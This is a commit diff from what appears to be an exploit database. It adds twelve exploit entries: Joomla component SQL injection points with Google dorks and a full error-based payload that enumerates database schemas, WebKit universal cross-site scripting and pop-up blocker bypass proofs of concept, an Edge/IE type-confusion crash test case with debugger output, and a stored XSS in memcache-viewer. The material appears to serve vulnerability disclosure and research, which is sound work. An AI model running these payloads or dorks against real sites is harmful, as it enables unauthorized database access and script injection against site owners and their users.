DB: 2017-02-25

12 new exploits

Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
Joomla! Component JooDatabase 3.1.0 - SQL Injection
Joomla! Component JO Facebook Gallery 4.5 - SQL Injection
Joomla! Component AJAX Search for K2 2.2 - SQL Injection
Joomla! Component Community Surveys 4.3 - SQL Injection
Joomla! Component Community Polls 4.5.0 - SQL Injection
Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting
Joomla! Component GPS Tools 4.0.1 - SQL Injection
Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass
Joomla! Component Community Quiz 4.3.5 - SQL Injection
Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting
memcache-viewer - Cross-Site Scripting

files.csv

@@ -5382,6 +5382,7 @@ id,file,description,date,author,platform,type,port
 41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
+41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -37360,3 +37361,14 @@ id,file,description,date,author,platform,type,port
 41440,platforms/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
 41441,platforms/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
 41442,platforms/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
+41444,platforms/php/webapps/41444.txt,"Joomla! Component JooDatabase 3.1.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
+41445,platforms/php/webapps/41445.txt,"Joomla! Component JO Facebook Gallery 4.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
+41446,platforms/php/webapps/41446.txt,"Joomla! Component AJAX Search for K2 2.2 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
+41447,platforms/php/webapps/41447.txt,"Joomla! Component Community Surveys 4.3 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
+41448,platforms/php/webapps/41448.txt,"Joomla! Component Community Polls 4.5.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
+41449,platforms/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",macos,webapps,0
+41450,platforms/php/webapps/41450.txt,"Joomla! Component GPS Tools 4.0.1 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
+41451,platforms/multiple/webapps/41451.html,"Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass",2017-02-24,"Google Security Research",multiple,webapps,0
+41452,platforms/php/webapps/41452.txt,"Joomla! Component Community Quiz 4.3.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
+41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
+41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0

platforms/macos/webapps/41449.html

@@ -0,0 +1,111 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
+
+When the new page is loading, FrameLoader::clear is called to clear the old document and window.
+
+Here's a snippet of FrameLoader::clear.
+
+void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
+{
+    ...
+    // Do this after detaching the document so that the unload event works.
+    if (clearWindowProperties) {
+        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
+        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
+        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
+
+        if (shouldClearWindowName(m_frame, *newDocument))
+            m_frame.tree().setName(nullAtom);
+    }
+
+    ...
+    m_frame.setDocument(nullptr); <<-------- (2)
+    ...
+}
+
+The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
+
+
+Tested on Safari 10.0.2(12602.3.12.0.1).
+-->
+
+<body>
+<script>
+
+/*
+
+Apple WebKit: UXSS via FrameLoader::clear
+
+When the new page is loading, FrameLoader::clear is called to clear the old document and window.
+
+Here's a snippet of FrameLoader::clear.
+
+void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
+{
+    ...
+    // Do this after detaching the document so that the unload event works.
+    if (clearWindowProperties) {
+        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
+        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
+        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
+
+        if (shouldClearWindowName(m_frame, *newDocument))
+            m_frame.tree().setName(nullAtom);
+    }
+
+    ...
+    m_frame.setDocument(nullptr); <<-------- (2)
+    ...
+}
+
+The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
+
+
+Tested on Safari 10.0.2(12602.3.12.0.1).
+*/
+
+"use strict";
+
+function log(txt) {
+    //if (Array.isArray(txt))
+    //    txt = Array.prototype.join.call(txt, ", ");
+
+    let c = document.createElement("div");
+    c.innerText = "log: " + txt;
+    d.appendChild(c);
+}
+
+function main() {
+    let f = document.body.appendChild(document.createElement("iframe"));
+    
+    let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
+    a.contentWindow.onunload = () => {
+        let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
+        b.contentWindow.onunload = () => {
+            f.src = "javascript:''";
+
+            let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
+            c.contentWindow.onunload = () => {
+                f.src = "javascript:''";
+
+                let d = f.contentDocument.appendChild(document.createElement("iframe"));
+                d.contentWindow.onunload = () => {
+                    f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
+                        alert(document.location);
+                    } + ")") + "')), 0);";
+                };
+            };
+        };
+    };
+
+    f.src = "https://abc.xyz/";
+}
+
+main();
+
+/*
+b JSC::globalFuncParseFloat
+
+*/
+</script>
+</body>

platforms/multiple/webapps/41451.html

@@ -0,0 +1,137 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1050
+
+The second argument of window.open is a name for the new window. If there's a frame that has same name, it will try to load the URL in that. If not, it just tries to create a new window and pop-up. But without the user's click event, its attempt will fail.
+
+Here's some snippets.
+
+RefPtr<DOMWindow> DOMWindow::open(const String& urlString, const AtomicString& frameName, const String& windowFeaturesString,
+    DOMWindow& activeWindow, DOMWindow& firstWindow)
+{
+    ...
+    ---------------- (1) -----------------------
+    if (!firstWindow.allowPopUp()) { <<---- checks there's the user's click event.
+        // Because FrameTree::find() returns true for empty strings, we must check for empty frame names.
+        // Otherwise, illegitimate window.open() calls with no name will pass right through the popup blocker.
+        if (frameName.isEmpty() || !m_frame->tree().find(frameName))
+            return nullptr;
+    }
+    --------------------------------------------
+    ...
+    RefPtr<Frame> result = createWindow(urlString, frameName, parseWindowFeatures(windowFeaturesString), activeWindow, *firstFrame, *m_frame);
+    return result ? result->document()->domWindow() : nullptr;
+}
+
+
+RefPtr<Frame> DOMWindow::createWindow(const String& urlString, const AtomicString& frameName, const WindowFeatures& windowFeatures, DOMWindow& activeWindow, Frame& firstFrame, Frame& openerFrame, std::function<void (DOMWindow&)> prepareDialogFunction)
+{
+    ...
+    RefPtr<Frame> newFrame = WebCore::createWindow(*activeFrame, openerFrame, frameRequest, windowFeatures, created);
+    if (!newFrame)
+        return nullptr;
+
+    ...
+}
+
+RefPtr<Frame> createWindow(Frame& openerFrame, Frame& lookupFrame, const FrameLoadRequest& request, const WindowFeatures& features, bool& created)
+{
+    ASSERT(!features.dialog || request.frameName().isEmpty());
+
+    created = false;
+
+    ---------------- (2) -----------------------
+    if (!request.frameName().isEmpty() && request.frameName() != "_blank") {
+        if (RefPtr<Frame> frame = lookupFrame.loader().findFrameForNavigation(request.frameName(), openerFrame.document())) {
+            if (request.frameName() != "_self") {
+                if (Page* page = frame->page())
+                    page->chrome().focus();
+            }
+            return frame;
+        }
+    }
+    --------------------------------------------
+
+    <<<<<----------- failed to find the frame, creates a new one.
+    ...
+}
+
+The logic of the code (1) depends on the assumption that if |m_frame->tree().find(frameName)| succeeds, |lookupFrame.loader().findFrameForNavigation| at (2) will also succeed. If we could make |m_frame->tree().find(frameName)| succeed but |lookupFrame.loader().findFrameForNavigation| fail, a new window will be created and popped up without the user's click event.
+
+
+
+Let's look into |findFrameForNavigation|.
+
+Frame* FrameLoader::findFrameForNavigation(const AtomicString& name, Document* activeDocument)
+{
+    Frame* frame = m_frame.tree().find(name);
+
+    // FIXME: Eventually all callers should supply the actual activeDocument so we can call canNavigate with the right document.
+    if (!activeDocument)
+        activeDocument = m_frame.document();
+
+    if (!activeDocument->canNavigate(frame))
+        return nullptr;
+
+    return frame;
+}
+
+bool Document::canNavigate(Frame* targetFrame)
+{
+    ...
+    if (isSandboxed(SandboxNavigation)) { <<<--------------- (1)
+        if (targetFrame->tree().isDescendantOf(m_frame))
+            return true;
+
+        const char* reason = "The frame attempting navigation is sandboxed, and is therefore disallowed from navigating its ancestors.";
+        if (isSandboxed(SandboxTopNavigation) && targetFrame == &m_frame->tree().top())
+            reason = "The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.";
+
+        printNavigationErrorMessage(targetFrame, url(), reason);
+        return false;
+    }
+
+    ...
+
+    if (canAccessAncestor(securityOrigin(), targetFrame)) <<<------------------- (2)
+        return true;
+
+    ...
+
+    return false;
+}
+
+There are two points to make |Document::canNavigate| return false.
+
+(1). Using a sandboxed iframe.
+<body>
+<iframe name="one"></iframe>
+<iframe id="two" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>
+
+<script>
+function main() {
+    two.eval('open("https://abc.xyz", "one");');
+}
+
+main()
+</script>
+</body>
+
+(2). Using a cross-origin iframe.
+-->
+
+<body>
+<iframe name="one"></iframe>
+
+<script>
+function main() {
+    document.body.appendChild(document.createElement("iframe")).contentDocument.location =
+        "data:text/html,<script>open('https://abc.xyz', 'one')</scri" + "pt>";
+}
+
+main()
+</script>
+</body>
+
+<!--
+Tested on Safari 10.0.2 (12602.3.12.0.1).
+-->

platforms/multiple/webapps/41453.html

@@ -0,0 +1,55 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1057
+
+Here's a snippet of Frame::setDocument.
+
+void Frame::setDocument(RefPtr<Document>&& newDocument)
+{
+    ASSERT(!newDocument || newDocument->frame() == this);
+
+    if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
+        m_doc->prepareForDestruction();
+
+    m_doc = newDocument.copyRef();
+    ...
+}
+
+Before setting |m_doc| to |newDocument|, it calls |prepareForDestruction| that fires unload event handlers. If we call |Frame::setDocument| with the new document |a|, and call |Frame::setDocument| again with the new document |b| in the unload event handler. Then |prepareForDestruction| will be never called on |b|, which means the frame will be never detached from |b|.
+
+PoC:
+-->
+
+"use strict";
+
+let f = document.documentElement.appendChild(document.createElement("iframe"));
+let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
+
+a.contentWindow.onunload = () => {
+    f.src = "javascript:''";
+
+    let b = f.contentDocument.appendChild(document.createElement("iframe"));
+    b.contentWindow.onunload = () => {
+        f.src = "javascript:''";
+
+        let doc = f.contentDocument;
+
+        f.onload = () => {
+            f.onload = () => {
+                f.onload = null;
+
+                let s = doc.createElement("form");
+                s.action = "javascript:alert(location)";
+                s.submit();
+            };
+
+            f.src = "https://abc.xyz/";
+        };
+
+    };
+};
+
+f.src = "javascript:''";
+
+<!--
+Tested on Safari 10.0.2(12602.3.12.0.1).
+-->

platforms/php/webapps/41438.txt

@@ -1,7 +1,7 @@
 # Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
 # Date: 02/18/2017
 # Exploit Author: Hanley Shun
-# Vendor Homepage: https://github.com/hamkovic/
+# Vendor Homepage: https://wpcore.com/plugin/mail-masta
 # Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
 # Version: 1.0
 # Tested on: Kali Linux x64, Ubuntu 14.04 x64

platforms/php/webapps/41444.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_joodb
+# Date: 24.02.2017
+# Vendor Homepage: https://feenders.de/
+# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
+# Demo: https://joodb.feenders.de/db-example.html
+# Version: 3.1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
+# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
+# # # # #

platforms/php/webapps/41445.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jofacebookgallery
+# Date: 24.02.2017
+# Vendor Homepage: http://joomcore.com/joomla32/
+# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
+# Demo: http://demo.joomcore.com/joomla32/
+# Version: 4.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
+# # # # #

platforms/php/webapps/41446.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_k2ajaxsearch
+# Date: 24.02.2017
+# Vendor Homepage: http://taleia.software/
+# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
+# Demo: http://k2ajaxsearch.taleia.software/demo/
+# Version: 2.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
+# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
+# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
+# # # # #

platforms/php/webapps/41447.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_communitysurveys
+# Date: 24.02.2017
+# Vendor Homepage: http://corejoomla.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
+# Demo: http://demo.corejoomla.com/surveys.html
+# Version: 4.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# index.php?option=com_communitysurveys&view=search
+# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
+# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
+# # # # #

platforms/php/webapps/41448.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_communitypolls
+# Date: 24.02.2017
+# Vendor Homepage: http://corejoomla.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
+# Demo: http://demo.corejoomla.com/polls.html
+# Version: 4.5.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# index.php?option=com_communitypolls&view=search
+# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
+# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
+# # # # #

platforms/php/webapps/41450.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component GPS Tools v4.0.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_gpstools
+# Date: 24.02.2017
+# Vendor Homepage: http://corejoomla.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/gps-tools/
+# Demo: http://demo.corejoomla.com/tracks.html
+# Version: 4.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# index.php?option=com_gpstools&view=search
+# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
+# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
+# # # # #

platforms/php/webapps/41452.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component Community Quiz v4.3.5 - SQL Injection
+# Google Dork: inurl:index.php?option=com_communityquiz
+# Date: 24.02.2017
+# Vendor Homepage: http://corejoomla.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/community-quiz/
+# Demo: http://demo.corejoomla.com/quiz.html
+# Version: 4.3.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# index.php?option=com_communityquiz&view=search
+# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=[SQL]&view=quizzes
+# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
+# # # # #

platforms/php/webapps/41455.txt

@@ -0,0 +1,30 @@
+# Exploit Title: memcache-viewer - Stored XSS
+# Date: 2017-02-24
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
+# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
+# Version: Latest commit
+# Tested on: Debian [wheezy]
+
+### Vulnerability 
+This program does not filter filtering on the special character when expressing the data from memcached on the web.
+When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.
+
+### Example Attack code
+1. Send Payload(XSS Code) after Connecting to memcached server.
+#> telnet 127.0.0.1 11211
+Trying 127.0.0.1...
+Connected to 127.0.0.1.
+Escape character is '^]'.
+
+add hacked<script>alert(45)</script> 0 900 2
+45
+STORED
+
+2. Insert data through memcached related 3rd party application.
+
+### Result
+Access index.php after memcache-viewer login
+DOM Area in index.php
+<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>

platforms/windows/dos/41454.html

@@ -0,0 +1,108 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
+
+PoC:
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<style>
+.class1 { float: left; column-count: 5; }
+.class2 { column-span: all; columns: 1px; }
+table {border-spacing: 0px;}
+</style>
+<script>
+function boom() {
+  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
+  th1.align = "right";
+}
+</script>
+<body onload="setInterval(boom,100)">
+<table cellspacing="0">
+<tr class="class1">
+<th id="th1" colspan="5" width=0></th>
+<th class="class2" width=0><div class="class2"></div></th>
+
+<!--
+Note: The analysis below is based on an 64-bit IE (running in single process mode) running on Windows Server 2012 R2. Microsoft Symbol Server has been down for several days and that's the only configuration for which I had up-to-date symbols. However Microsoft Edge and 32-bit IE 11 should behave similarly.
+
+The PoC crashes in
+MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement
+when reading from address 0000007800000070
+
+(5fc.8a4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
+00007ffe`8f330a59 48833800        cmp     qword ptr [rax],0 ds:00000078`00000070=????????????????
+
+With the following call stack:
+
+Child-SP          RetAddr           Call Site
+00000071`0e75b960 00007ffe`8f3f1836 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4
+00000071`0e75b9c0 00007ffe`8e9ba9df MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
+00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
+00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
+00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
+00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
+00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageCollection::FormatPage+0x1f3
+00000071`0e75be60 00007ffe`8e9affd1 MSHTML!Layout::PageCollection::LayoutPagesCore+0x38c
+00000071`0e75c030 00007ffe`8e9b099b MSHTML!Layout::PageCollection::LayoutPages+0x102
+00000071`0e75c090 00007ffe`8e9aff45 MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x50b
+00000071`0e75c220 00007ffe`8ea74047 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd5
+00000071`0e75c2f0 00007ffe`8ea73c95 MSHTML!CMarkupPageLayout::DoLayout+0xf7
+00000071`0e75c360 00007ffe`8e98066d MSHTML!CView::ExecuteLayoutTasks+0x17c
+00000071`0e75c3f0 00007ffe`8e983b7a MSHTML!CView::EnsureView+0x43f
+00000071`0e75c4d0 00007ffe`8e97f82b MSHTML!CPaintController::EnsureView+0x58
+00000071`0e75c500 00007ffe`8ea2e47e MSHTML!CPaintBeat::OnBeat+0x41b
+00000071`0e75c580 00007ffe`8ea2e414 MSHTML!CPaintBeat::OnPaintTimer+0x5a
+00000071`0e75c5b0 00007ffe`8f2765dc MSHTML!CContainedTimerSink<CPaintBeat>::OnTimerMethodCall+0xdb
+00000071`0e75c5e0 00007ffe`8e969d52 MSHTML!GlobalWndOnPaintPriorityMethodCall+0x1f7
+00000071`0e75c690 00007ffe`afc13fe0 MSHTML!GlobalWndProc+0x1b8
+00000071`0e75c710 00007ffe`afc13af2 USER32!UserCallWinProcCheckWow+0x1be
+00000071`0e75c7e0 00007ffe`afc13bbe USER32!DispatchClientMessage+0xa2
+00000071`0e75c840 00007ffe`b2352524 USER32!_fnDWORD+0x3e
+00000071`0e75c8a0 00007ffe`afc1cfaa ntdll!KiUserCallbackDispatcherContinue
+00000071`0e75c928 00007ffe`afc1cfbc USER32!ZwUserDispatchMessage+0xa
+00000071`0e75c930 00007ffe`95d1bb28 USER32!DispatchMessageWorker+0x2ac
+00000071`0e75c9b0 00007ffe`95d324cb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+00000071`0e75fc30 00007ffe`aa81572f IEFRAME!LCIETab_ThreadProc+0x3a3
+00000071`0e75fd60 00007ffe`9594925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f
+00000071`0e75fd90 00007ffe`b1d313d2 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+00000071`0e75fde0 00007ffe`b22d54e4 KERNEL32!BaseThreadInitThunk+0x22
+00000071`0e75fe10 00000000`00000000 ntdll!RtlUserThreadStart+0x34
+
+And the following register values:
+
+rax=0000007800000070 rbx=0000000000000064 rcx=0000007800000050
+rdx=0000000000000048 rsi=00000079164a8f01 rdi=00007ffe8f9f81b0
+rip=00007ffe8f330a59 rsp=000000710e75b960 rbp=0000007916492fe8
+ r8=0000007916490ec0  r9=000000710e75b980 r10=00000079164a8f30
+r11=000000710e75b928 r12=000000710e75c000 r13=0000007916450fc8
+r14=000000791648ec60 r15=0000007911ec9f50
+
+Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address.
+
+Let's take a look at the code around the rip of the crash.
+
+00007ffe`8f330a51 488bcd          mov     rcx,rbp
+00007ffe`8f330a54 e8873c64ff      call    MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
+00007ffe`8f330a59 48833800        cmp     qword ptr [rax],0 ds:00000078`00000070=????????????????
+00007ffe`8f330a5d 743d            je      MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c)
+00007ffe`8f330a5f 488bcd          mov     rcx,rbp
